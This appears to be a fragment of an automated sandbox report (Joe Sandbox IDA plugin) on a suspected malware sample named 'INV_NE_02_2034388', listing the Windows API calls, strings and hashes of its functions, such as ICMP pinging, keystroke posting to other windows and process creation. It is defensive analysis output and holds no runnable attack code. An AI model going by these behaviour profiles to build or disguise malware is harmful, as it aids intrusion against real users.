                                          • Opcode Fuzzy Hash: c04c75621ce49cc5f6b0995f70e74a0e3f94a869c5641639a45c403aad8c8130
                                          • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00475793
                                          • inet_addr.WSOCK32(?,?,?), ref: 004757D8
                                          • gethostbyname.WSOCK32(?), ref: 004757E4
                                          • IcmpCreateFile.IPHLPAPI ref: 004757F2
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
                                          • WSACleanup.WSOCK32 ref: 004758F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                          • Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
                                          • Opcode Fuzzy Hash: 8c1f62a028f67a861641f920bff49acae339ba4ee59605ba5ff9b7a17a6566e8
                                          • Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                          • GetLastError.KERNEL32 ref: 0046B550
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                          • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                          • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                          • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                          • GetDlgCtrlID.USER32 ref: 0045901F
                                          • GetParent.USER32 ref: 0045903B
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                          • GetDlgCtrlID.USER32(?), ref: 00459047
                                          • GetParent.USER32(?), ref: 00459063
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                                          • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                          • Opcode Fuzzy Hash: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                                          • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                          APIs
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                          • GetDlgCtrlID.USER32 ref: 00459108
                                          • GetParent.USER32 ref: 00459124
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                          • GetDlgCtrlID.USER32(?), ref: 00459130
                                          • GetParent.USER32(?), ref: 0045914C
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                                          • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                          • Opcode Fuzzy Hash: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                                          • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                          APIs
                                          • GetParent.USER32 ref: 0045916F
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                          • _wcscmp.LIBCMT ref: 00459196
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                          • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                          • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                          • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                          • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                          • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                          • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-2080382077
                                          • Opcode ID: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                                          • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                          • Opcode Fuzzy Hash: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                                          • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                          APIs
                                          • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                          • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                          • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                          • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                            • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                            • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                            • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                          • GetDC.USER32 ref: 0043CD32
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                          • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                          • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                          • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                          • Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
                                          • Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
                                          • Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                                          • SysFreeString.OLEAUT32(?), ref: 00478F00
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                          • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                          • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                          • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                          APIs
                                          • _memset.LIBCMT ref: 0047F6B5
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                          • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                          • CloseHandle.KERNEL32(?), ref: 0047FB22
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: b61b5092976dc11b3ed5dc071c2aa5c938d2e0620ac829c290ec03e61a2ac541
                                          • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                                          • Opcode Fuzzy Hash: b61b5092976dc11b3ed5dc071c2aa5c938d2e0620ac829c290ec03e61a2ac541
                                          • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                                          APIs
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                            • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                          • _wcscmp.LIBCMT ref: 00464D5A
                                          • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                                          • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                          • Opcode Fuzzy Hash: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                                          • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                          • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                          • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                          • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                          • DestroyIcon.USER32(00000000), ref: 0043C37F
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                          • DestroyIcon.USER32(?), ref: 0043C3AB
                                            • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                          • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                          • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                          • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                          APIs
                                            • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                            • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                            • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                          • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                          • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                          • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                          • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                          • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                          • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                          • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                          • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                          • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                          • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                          • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                          APIs
                                            • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                            • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                            • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                            • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                          • _memset.LIBCMT ref: 00479813
                                          • _memset.LIBCMT ref: 00479956
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                          • CoTaskMemFree.OLE32(?), ref: 0047998D
                                          Strings
                                          • NULL Pointer assignment, xrefs: 004799DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                          • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                          • Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                          • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                          • _wcscat.LIBCMT ref: 00486EAD
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                          • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                          • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
